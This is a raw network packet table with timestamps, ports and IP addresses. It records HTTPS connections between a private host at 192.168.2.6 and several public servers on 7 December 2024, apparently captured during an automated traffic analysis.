Dec 7, 2024 10:51:20.739680052 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.739742994 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.739758015 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.739811897 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.920011997 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.920034885 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.920109987 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.920124054 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.920167923 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.920252085 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.963512897 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.963531971 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.963588953 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.963597059 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.963634968 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.963660955 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.966114998 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.966137886 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.966516972 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.966588020 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.966588020 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.966862917 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.966876984 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.967112064 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.967118025 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.967179060 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.967192888 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.967210054 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.967443943 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.967482090 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.967534065 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.968435049 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.968554020 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.968571901 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.968810081 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.968899965 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.968914986 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.969604969 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:20.969619036 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:20.969947100 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:20.969948053 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:20.969996929 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:21.011333942 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.011344910 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.015333891 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:21.015342951 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.091919899 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.091942072 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.092035055 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.092047930 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.092116117 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.130141973 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.130162001 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.130229950 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.130239010 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.130269051 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.130283117 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.163081884 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.163100004 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.163199902 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.163208961 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.163268089 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.183368921 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.183384895 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.183484077 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.183490992 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.183567047 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.281784058 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.281827927 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.281882048 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.281889915 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.281928062 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.281955004 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.299829006 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.299849987 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.299930096 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.299937010 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.299988031 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.313604116 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.313618898 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.313688040 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.313700914 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.313754082 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.328129053 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.328165054 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.328180075 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.328231096 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.328243017 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.328280926 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.328295946 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.328738928 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.328757048 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.328814030 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.328825951 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.328826904 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.328876972 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.331496954 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331513882 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331528902 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331543922 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.331557035 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331579924 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.331620932 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.331861019 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331888914 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331903934 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331926107 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.331933022 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.331963062 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.331994057 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.335750103 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.335787058 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.335803032 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.335834980 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.335843086 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.335880995 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.335926056 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.343918085 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.343935013 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.343985081 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.343996048 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.344022989 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.344068050 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.344068050 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.344127893 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.344480038 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.344491959 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.386221886 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.386255980 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.386476994 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.386568069 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.386621952 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.386759996 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.387128115 CET	49733	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.387141943 CET	443	49733	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.387653112 CET	49734	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.387684107 CET	443	49734	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.390106916 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.390127897 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.390178919 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.390583038 CET	49735	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.390595913 CET	443	49735	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.392457008 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.392483950 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.392573118 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.393503904 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.393526077 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.393656015 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.393702030 CET	49737	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.393708944 CET	443	49737	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.393992901 CET	49736	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:21.394009113 CET	443	49736	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:21.491158009 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:21.491188049 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:21.491254091 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:21.491264105 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:21.491337061 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:21.491890907 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:21.491940975 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:21.491960049 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:21.492002964 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:21.501317024 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:21.501331091 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:21.512111902 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.512145996 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.512191057 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.512209892 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.512265921 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.512299061 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.512430906 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.512461901 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.512504101 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.512511015 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.512542963 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.512583017 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.513005972 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.513032913 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.513380051 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.513392925 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.513474941 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.514043093 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.514061928 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.514121056 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.514128923 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.514161110 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.514211893 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.557929993 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.558005095 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.558012962 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.558024883 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.558121920 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.564110041 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.564135075 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.564194918 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.564205885 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.564234972 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.564251900 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.566098928 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.566128016 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.566180944 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.566191912 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.566243887 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.566243887 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.567080021 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.567101955 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.567161083 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.567167997 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.567213058 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.567213058 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.684653997 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.684688091 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.684766054 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.684783936 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.684837103 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.684844971 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.688648939 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.688680887 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.688721895 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.688734055 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.688774109 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.688782930 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.691215992 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.691241026 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.691286087 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.691297054 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.691354990 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.696067095 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.696085930 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.696147919 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.696156979 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.696194887 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.696202993 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.708065033 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.708091021 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.708156109 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.708164930 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.708189964 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.708205938 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.726962090 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.726980925 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.727054119 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.727061033 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.727092981 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.727108955 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.729459047 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.729490042 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.729521990 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.729532957 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.729562998 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.729615927 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.731261015 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.731281996 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.731345892 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.731383085 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.731398106 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.731626034 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.733215094 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.733234882 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.733300924 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.733309031 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.733335972 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.733367920 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.745363951 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.745381117 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.745467901 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.745476961 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.745574951 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.748092890 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.748110056 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.748186111 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.748195887 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.748306036 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.750138044 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.750159979 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.750196934 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.750205040 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.750263929 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.750263929 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.764446020 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.764466047 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.764508963 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.764518976 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.764570951 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.764570951 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.786268950 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.786333084 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.786425114 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.787105083 CET	49738	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.787122011 CET	443	49738	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.864797115 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.864824057 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.864901066 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.864911079 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.864953041 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.864980936 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.867213011 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.867245913 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.867297888 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.867306948 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.867342949 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.867357016 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.873485088 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.873534918 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.873594999 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.873605967 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.873656034 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.873656034 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.876030922 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.876048088 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.876123905 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.876132965 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.878079891 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.880156994 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.880193949 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.880249977 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.880259037 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.880266905 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.882075071 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.882662058 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.882703066 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.882739067 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.882745028 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.882819891 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.882819891 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.886749983 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.886770964 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.886842966 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.886851072 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.886903048 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.886903048 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.898044109 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.898066044 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.898153067 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.898169041 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.898195982 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.898242950 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.898680925 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.898725986 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:21.898746014 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:21.898757935 CET	443	49721	150.171.27.10	192.168.2.6
